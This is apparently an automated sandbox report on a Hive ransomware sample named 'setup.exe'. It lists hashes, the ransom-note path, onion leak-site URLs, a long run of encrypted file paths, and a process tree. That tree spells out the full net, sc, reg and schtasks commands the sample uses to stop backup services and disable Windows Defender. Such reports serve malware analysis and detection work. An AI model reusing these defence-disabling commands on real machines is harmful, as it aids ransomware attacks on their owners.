Analysis
-
max time kernel
103s -
max time network
19s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
05-01-2022 13:01
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
setup.exe
Resource
win10-en-20211208
General
-
Target
setup.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Extracted
C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2132 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2068 bcdedit.exe 2092 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
setup.exedescription ioc process File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18197_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\flyout.css setup.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18249_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui setup.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21301_.GIF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\js\slideShow.js setup.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\n8pw_HOW_TO_DECRYPT.txt setup.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188669.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00808_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01848_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePage.html.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts2.css.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InputPersonalization.exe.mui setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Metro.eftx.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\THMBNAIL.PNG.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_SlateBlue.gif.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\gadget.xml setup.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\n8pw_HOW_TO_DECRYPT.txt setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01875_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106816.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_VelvetRose.gif.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png setup.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Common Files\System\fr-FR\wab32res.dll.mui setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Foundry.eftx.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15035_.GIF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv setup.exe File opened for modification C:\Program Files\DVD Maker\Shared\Filters.xml setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_IAAAACAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14753_.GIF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_up.png setup.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\n8pw_HOW_TO_DECRYPT.txt setup.exe File created C:\Program Files\Microsoft Games\Solitaire\en-US\n8pw_HOW_TO_DECRYPT.txt setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\n8pw_HOW_TO_DECRYPT.txt setup.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\n8pw_HOW_TO_DECRYPT.txt setup.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt setup.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css.zVcPop1VTFm5Jelr8f-StEf3VD_EWIv3FMgSK3C1dnf_AAAAAAAAAAA0.cv2gj setup.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1060 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2580 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exesetup.exepid process 2164 powershell.exe 2248 powershell.exe 1912 setup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1156 wevtutil.exe Token: SeBackupPrivilege 1156 wevtutil.exe Token: SeSecurityPrivilege 1612 wevtutil.exe Token: SeBackupPrivilege 1612 wevtutil.exe Token: SeSecurityPrivilege 1684 wevtutil.exe Token: SeBackupPrivilege 1684 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1696 wmic.exe Token: SeSecurityPrivilege 1696 wmic.exe Token: SeTakeOwnershipPrivilege 1696 wmic.exe Token: SeLoadDriverPrivilege 1696 wmic.exe Token: SeSystemProfilePrivilege 1696 wmic.exe Token: SeSystemtimePrivilege 1696 wmic.exe Token: SeProfSingleProcessPrivilege 1696 wmic.exe Token: SeIncBasePriorityPrivilege 1696 wmic.exe Token: SeCreatePagefilePrivilege 1696 wmic.exe Token: SeBackupPrivilege 1696 wmic.exe Token: SeRestorePrivilege 1696 wmic.exe Token: SeShutdownPrivilege 1696 wmic.exe Token: SeDebugPrivilege 1696 wmic.exe Token: SeSystemEnvironmentPrivilege 1696 wmic.exe Token: SeRemoteShutdownPrivilege 1696 wmic.exe Token: SeUndockPrivilege 1696 wmic.exe Token: SeManageVolumePrivilege 1696 wmic.exe Token: 33 1696 wmic.exe Token: 34 1696 wmic.exe Token: 35 1696 wmic.exe Token: SeIncreaseQuotaPrivilege 1484 wmic.exe Token: SeSecurityPrivilege 1484 wmic.exe Token: SeTakeOwnershipPrivilege 1484 wmic.exe Token: SeLoadDriverPrivilege 1484 wmic.exe Token: SeSystemProfilePrivilege 1484 wmic.exe Token: SeSystemtimePrivilege 1484 wmic.exe Token: SeProfSingleProcessPrivilege 1484 wmic.exe Token: SeIncBasePriorityPrivilege 1484 wmic.exe Token: SeCreatePagefilePrivilege 1484 wmic.exe Token: SeBackupPrivilege 1484 wmic.exe Token: SeRestorePrivilege 1484 wmic.exe Token: SeShutdownPrivilege 1484 wmic.exe Token: SeDebugPrivilege 1484 wmic.exe Token: SeSystemEnvironmentPrivilege 1484 wmic.exe Token: SeRemoteShutdownPrivilege 1484 wmic.exe Token: SeUndockPrivilege 1484 wmic.exe Token: SeManageVolumePrivilege 1484 wmic.exe Token: 33 1484 wmic.exe Token: 34 1484 wmic.exe Token: 35 1484 wmic.exe Token: SeIncreaseQuotaPrivilege 1484 wmic.exe Token: SeSecurityPrivilege 1484 wmic.exe Token: SeTakeOwnershipPrivilege 1484 wmic.exe Token: SeLoadDriverPrivilege 1484 wmic.exe Token: SeSystemProfilePrivilege 1484 wmic.exe Token: SeSystemtimePrivilege 1484 wmic.exe Token: SeProfSingleProcessPrivilege 1484 wmic.exe Token: SeIncBasePriorityPrivilege 1484 wmic.exe Token: SeCreatePagefilePrivilege 1484 wmic.exe Token: SeBackupPrivilege 1484 wmic.exe Token: SeRestorePrivilege 1484 wmic.exe Token: SeShutdownPrivilege 1484 wmic.exe Token: SeDebugPrivilege 1484 wmic.exe Token: SeSystemEnvironmentPrivilege 1484 wmic.exe Token: SeRemoteShutdownPrivilege 1484 wmic.exe Token: SeUndockPrivilege 1484 wmic.exe Token: SeManageVolumePrivilege 1484 wmic.exe Token: 33 1484 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1912 wrote to memory of 596 1912 setup.exe net.exe PID 1912 wrote to memory of 596 1912 setup.exe net.exe PID 1912 wrote to memory of 596 1912 setup.exe net.exe PID 596 wrote to memory of 756 596 net.exe net1.exe PID 596 wrote to memory of 756 596 net.exe net1.exe PID 596 wrote to memory of 756 596 net.exe net1.exe PID 1912 wrote to memory of 1240 1912 setup.exe net.exe PID 1912 wrote to memory of 1240 1912 setup.exe net.exe PID 1912 wrote to memory of 1240 1912 setup.exe net.exe PID 1240 wrote to memory of 1492 1240 net.exe net1.exe PID 1240 wrote to memory of 1492 1240 net.exe net1.exe PID 1240 wrote to memory of 1492 1240 net.exe net1.exe PID 1912 wrote to memory of 112 1912 setup.exe net.exe PID 1912 wrote to memory of 112 1912 setup.exe net.exe PID 1912 wrote to memory of 112 1912 setup.exe net.exe PID 112 wrote to memory of 1852 112 net.exe net1.exe PID 112 wrote to memory of 1852 112 net.exe net1.exe PID 112 wrote to memory of 1852 112 net.exe net1.exe PID 1912 wrote to memory of 688 1912 setup.exe net.exe PID 1912 wrote to memory of 688 1912 setup.exe net.exe PID 1912 wrote to memory of 688 1912 setup.exe net.exe PID 688 wrote to memory of 900 688 net.exe net1.exe PID 688 wrote to memory of 900 688 net.exe net1.exe PID 688 wrote to memory of 900 688 net.exe net1.exe PID 1912 wrote to memory of 1832 1912 setup.exe net.exe PID 1912 wrote to memory of 1832 1912 setup.exe net.exe PID 1912 wrote to memory of 1832 1912 setup.exe net.exe PID 1832 wrote to memory of 436 1832 net.exe net1.exe PID 1832 wrote to memory of 436 1832 net.exe net1.exe PID 1832 wrote to memory of 436 1832 net.exe net1.exe PID 1912 wrote to memory of 1812 1912 setup.exe net.exe PID 1912 wrote to memory of 1812 1912 setup.exe net.exe PID 1912 wrote to memory of 1812 1912 setup.exe net.exe PID 1812 wrote to memory of 1216 1812 net.exe net1.exe PID 1812 wrote to memory of 1216 1812 net.exe net1.exe PID 1812 wrote to memory of 1216 1812 net.exe net1.exe PID 1912 wrote to memory of 1328 1912 setup.exe net.exe PID 1912 wrote to memory of 1328 1912 setup.exe net.exe PID 1912 wrote to memory of 1328 1912 setup.exe net.exe PID 1328 wrote to memory of 1904 1328 net.exe net1.exe PID 1328 wrote to memory of 1904 1328 net.exe net1.exe PID 1328 wrote to memory of 1904 1328 net.exe net1.exe PID 1912 wrote to memory of 1752 1912 setup.exe net.exe PID 1912 wrote to memory of 1752 1912 setup.exe net.exe PID 1912 wrote to memory of 1752 1912 setup.exe net.exe PID 1752 wrote to memory of 632 1752 net.exe net1.exe PID 1752 wrote to memory of 632 1752 net.exe net1.exe PID 1752 wrote to memory of 632 1752 net.exe net1.exe PID 1912 wrote to memory of 1228 1912 setup.exe sc.exe PID 1912 wrote to memory of 1228 1912 setup.exe sc.exe PID 1912 wrote to memory of 1228 1912 setup.exe sc.exe PID 1912 wrote to memory of 1004 1912 setup.exe sc.exe PID 1912 wrote to memory of 1004 1912 setup.exe sc.exe PID 1912 wrote to memory of 1004 1912 setup.exe sc.exe PID 1912 wrote to memory of 2040 1912 setup.exe sc.exe PID 1912 wrote to memory of 2040 1912 setup.exe sc.exe PID 1912 wrote to memory of 2040 1912 setup.exe sc.exe PID 1912 wrote to memory of 1500 1912 setup.exe sc.exe PID 1912 wrote to memory of 1500 1912 setup.exe sc.exe PID 1912 wrote to memory of 1500 1912 setup.exe sc.exe PID 1912 wrote to memory of 876 1912 setup.exe sc.exe PID 1912 wrote to memory of 876 1912 setup.exe sc.exe PID 1912 wrote to memory of 876 1912 setup.exe sc.exe PID 1912 wrote to memory of 868 1912 setup.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:596 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:756
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1492
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1852
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:900
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:436
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1216
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1904
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:632
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1228
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1004
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2040
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1500
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:876
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:868
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1700
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:908
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1636
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2020
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1316
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1208
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1200
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1512
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:632
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1076
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:560
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:932
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2004
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:836
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1120
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1556
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1660
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1824
-
